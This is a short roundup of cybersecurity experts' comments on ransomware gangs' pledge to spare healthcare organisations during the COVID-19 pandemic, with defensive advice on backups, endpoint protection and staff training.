In response to the Bleeping Computer report that explains some ransomware operators have agreed to no longer target health and medical organizations during the pandemic, experts from cybersecurity firms Cerberus Sentinel and KnowBe4 offer perspective.
Certain malware campaigns can cause huge amounts of collateral damage, such as Petya’s inadvertent impact on the global manufacturing industry. For this reason, we shouldn’t fully trust popular ransomware operators like Maze, DoppelPaymer, Ryuk, Sodinokibi/REvil, PwndLocker, and Ako to fully avert inflicting collateral damage on the healthcare and medical industries
With this in mind, when it comes to protecting healthcare and medical organisations, my advice remains the same: a defence-in-depth approach must be adopted to ensure that many layers of protection are in place in order to defend critical infrastructures as well as any sensitive digital assets.
This begins with a strong and effective data backup strategy with regular tests conducted to ensure data confidentiality, integrity and availability remains fit for purpose if disaster strikes. Secondly, a robust endpoint protection solution must be deployed and combined with traditional malware protection and behaviour analysis to detect and deter even the most advanced malware attacks. Finally, it’s vital security technology controls such as regular vulnerability assessments, web application firewalls, network content scanners, network intrusion protection systems, and data leakage prevention systems are in place, to augment healthcare and medical organisations’ ability to defend better against even the most persistent ransomware operators.
We do believe that the two main hacking groups (Maze and Doppelpaymer) who mentioned they will not attack will keep their word. However, to our knowledge, one of the most talked about groups over the last couple of months – Sodinokibi – has not yet responded to what their actions will be regarding COVID-19-related attacks. In addition, there are endless smaller hacking groups and threat actors that also didn\’t specifically state that they won\’t attack and at any given time they can decide to do so.
While this is welcome news, let\’s not let this think these are good people running these ransomware gangs. More likely, they are probably aware that targeting these sorts of places during a global pandemic would push them straight into the spotlight of the most hated people in the world and would bring law enforcement and global pressure on them in ways they do not want. Let\’s face it, these groups already walk a tight line and being responsible for the loss of human lives during a time like this would open up the hunt for them with additional resources they do not want to deal with. Most are in the business to make money and they weigh that with the risk of being caught. Causing issues now in healthcare would simply tip those scales to the \”too risky\” side of the equation.
Just because ransomware operators are agreeing to avoid attacks on medical facilities does not mean other attackers are not trying to benefit from this event, so organizations cannot leave their guard down. As a matter of fact, here at KnowBe4, we have seen the number of reported coronavirus-themed phishing and scams explode since Monday, March 16th. Organizations in all industries need to ensure that they are training people to spot and report these attacks, even if ransomware operators are stepping back these other attacks are not going anywhere soon.
These are strange times indeed we are living in. It is not the first time though that a ransomware operator has shown leniency towards victims or targets. In the past there have been cases where ransomware has been removed for free when the victim demonstrated they were genuinely unable to afford the ransom or it hit some critical service.
And while some criminal gangs may be trying to be honest in their intentions to not target health and medical organisations, there is no guarantee that all criminal organisations or lone operators share the same values. It is also not always possible to correctly identify medical institutes and they still may be inadvertently targeted.
Ultimately, medical, and all other organisations cannot rely on the goodwill of criminals to not target them during the time of weakness. Rather, organisations should be prepared at all times for attacks, both by having the right technologies in place, and also providing the right security awareness and training to employees to help them identify and report any potential ransomware attacks.
Healthcare organizations should absolutely not trust cybercriminals to halt operations during the COVID-19 pandemic. Information we are seeing is that malware authors and hacking forum administrators are asking the hackers they support not to stop breaking into businesses, but rather to delay launching their ransomware or other extortion tools until the pandemic passes. The motivation is not altruistic, but instead selfishly concerned that the criminals won’t be paid while their victims are shut down in responding to the pandemic. Healthcare organizations especially should remain vigilant that attackers may be resident with backdoors in their networks for weeks or months before launching their ransomware tools. Because of this extended delay between breaching and extorting, the backdoors used to maintain access can be copied into the organization’s backups, meaning that restoring from them an restore cybercriminals access.